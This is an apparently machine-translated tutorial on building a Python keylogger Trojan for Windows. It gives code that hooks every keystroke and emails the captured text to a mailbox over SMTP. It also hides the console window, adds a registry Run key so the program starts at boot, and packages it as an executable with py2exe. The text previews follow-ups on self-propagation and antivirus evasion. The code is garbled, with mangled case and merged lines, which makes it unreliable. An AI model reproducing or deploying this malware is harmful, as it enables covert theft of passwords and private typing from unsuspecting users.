Recently contacted with Python's Win32 Library, library subroutines provides a number of APIs that can be used for Windows development, making use of this principle to make a prototype of a keyboard listening Trojan.
Additional module Pythonhook (when placing hooks) is needed here, pythoncom
Main monitoring function related code:
#放置键盘监听钩子def seeing (): Ph=pyhook.hookmanager () PH. Keydown=keyboardevent PH. Hookkeyboard () pythoncom. Pumpmessages () #键盘事件def keyboardevent (event): #print event. Key, If Len (a) <=20: #这里用于实验只但满20字符时发送邮件, you can increase your own A.append (event. Key) Else: text= '. Join (a) if Send_mail (to, "Keylogger test1", text): print "suceed!" else: print "failed!" Sys.exit (0) return True
This is the code for the core function of the program, which listens to all keyboard events and saves them in list_a.
The next step is to use the SMTP protocol
Record results for sending keyboard events:
The relevant code is as follows:
#smtp发邮件import sysimport reimport urllibimport smtplibimport randomfrom email.mime.text import mimetext # You can change to=[' ******@163.com ']host= "smtp.163.com" #smtp服务器user = "* * *" #用户名password = "******" depending on protocol or SMTP server #密码postfix = "163.com" #后缀 # Send letter function def send_mail (to_list,sub,content): me= "keylogger" + "<" +user+ "@" + postfix+ ">" msg = mimetext (content,_subtype= ' plain ', _charset= ' gb2312 ') msg[' Subject '] = Sub msg[' From '] = Me msg[' to '] = ";". Join (To_list) try: server = Smtplib. SMTP () server.connect (host) Server.login (User,password) server.sendmail (Me, to_list, Msg.as_ String ()) server.close () return True except Exception, E: print str (e)
The core functional part of the prototype is complete, and now the listener is modified:
When monitoring is in progress, the console form should not be available and should only be done in the background process. Here's how to start without the console form and silently in the background.
Related code:
Import ctypes# hidden console form def hiding (): whnd = Ctypes.windll.kernel32.GetConsoleWindow () if whnd! = 0: Ctypes.windll.user32.ShowWindow (whnd, 0) Ctypes.windll.kernel32.CloseHandle (WHND)
But just above is not enough, a complete Trojan program also needs to include self-propagating, self-priming.
Here we need to modify WinDOS registry information, WINAPI This library provides methods:
1. First, you need to obtain the location of the execution program itself.
Related code:
#获得木马所在位置def path (): import Inspect,os caller_file=inspect.stack () [1][1] return Os.path.abspath ( Os.path.dirname (Caller_file))
2. Modify the registry information:
Related code:
Def autorun (): Path_way=path () key = Win32API. RegOpenKey (Win32con. HKEY_LOCAL_MACHINE, ' Software\\software\\microsoft\\windows\\currentversion\\run ', 0, Win32con. key_all_access) Win32. RegCreateKey (Key,pathon_way) #给注册表自启动项添加木马所在路径 Win32. RegCloseKey (key) return
Such a listening keyboard event of the Trojan is basically completed, of course, including how to self-propagation (the next one will be mentioned in detail).
Here's a question that most computers don't have a Python interpreter installed, and about how Python executes on other Windows programs, I used the method provided by Py2exe,distutils,
The new version of Distutuils is in Py2exe.
First create a setup.py
The relevant code is as follows:
#setup. Pyfrom distutils.core Import setupimport py2exesetup (console=["hiding.py"]) #此处为需要封装的python文件名
Then execute in console:
Python setup.py Py2exe
Then the py2exe is generated so that a Trojan horse that listens for keyboard information is completed.
Try running the following:
Clear text transmission, but a short time after accepting hundreds of messages, the server may freeze the mailbox, so the way to accept keyboard event information can be improved, such as a more appropriate communication protocol.
In the following article will mention how to shell out a variety of anti-virus software.
PS: This article is for study only, don't cross the border easily!
Python keyboard monitoring Trojan (SMTP mailbox to receive monitoring results, modify the registry self-start)